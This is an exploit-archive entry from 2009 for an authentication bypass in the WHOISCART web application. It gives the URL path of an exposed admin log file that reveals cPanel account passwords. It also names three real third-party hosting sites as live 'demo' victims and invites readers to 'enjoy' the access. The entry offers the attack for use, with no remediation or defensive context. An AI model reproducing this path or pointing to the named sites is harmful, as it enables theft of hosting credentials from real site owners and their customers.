[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : WHOISCART (Auth Bypass) Information Disclosure Vulnerability
# Published : 2009-06-29
# Author : SecurityRules
# Previous Title : Messages Library 2.0 Arbitrary Administrator Account Vulnerability
# Next Title : Messages Library 2.0 (cat.php CatID) SQL Injection Vulnerability


+===================================================================================+
            ./SEC-R1Z   _ __ _  _ _ _ ___ _ _ _ _   __  _ _ _ _ _             
            / /_ _ _ _ /   _ _/   _ _ /        <   |/_ _ _ _ /   
             _ _ _ _/  /___ /  /   __  |  |)   / |  |   /   /
             _ _ _ _/  /___ /  /  | __ ||      /  |  |  /   / 
              _______  _ _   2_0_0_9 |        |  | /   /____  
            /_ _ _ _ _ _ _ _/ _ _ _ /  |__| __ |__|/_ _ _ _ _
+===================================================================================+
|                                                                                   |
|                                                                                   |
|                     WHOISCART ADMIN BYPASS                                        |
|                                                                                   |
+===================================================================================+
|                                                                                   |
| Author.: Black Dream                                                              |
| Contact: Be5_at_HoTMail_dot_Fr                                                    |
| HoMe   : www.sec-r1z.com                                                          |
|    ARAB ETHICAL HACKING, PENETRATION TESTING & WEB APPLICATION SECURITY SYSTEM    |
+===================================================================================+
|                                                                                   |
| Script.: WHOISCART                                                                |
| Home...: http://whoiscart.net                                                     |
|                                                                                   |
+-----------------------------------------------------------------------------------+
|                                                                                   |
| Exploit:                                                                          |
|                                                                                   |
| http://[website]/[script]/admin/hostinginterfaces/cpanel_1_log.htm                |
|                                                                                   |
| [+] Demo                                                                          |
|                                                                                   |
| http://www.denverwebhost.com/whoiscart/admin/hostinginterfaces/cpanel_1_log.htm   |
|                                                                                   |
| http://www.bearmedia.net/whoiscart/admin/hostinginterfaces/cpanel_1_log.htm       |
|                                                                                   |
| http://thevillagehost.com/whoiscart/admin/hostinginterfaces/cpanel_1_log.htm      |
|                                                                                   |
|                                                                                   |
|                                                                                   |
| [+] Now you see all cpanel[s] accout[pwd] xD   Pure admin                         |
|                                                                                   |
| [+] Enjoy xD                                                                      |             
+-----------------------------------------------------------------------------------|

+===================================================================================+
|                                                                                   |
| Greetz.: ~ j0rd4n14n.r1z ~ Linux-D3v1L ~ S4s-T3rr0rist ~ Golden-Z3r0              |
|                       And All #sec-r1z memb3rz!!!!                                |
+===================================================================================+
E0D|F

# www.Syue.com [2009-06-29]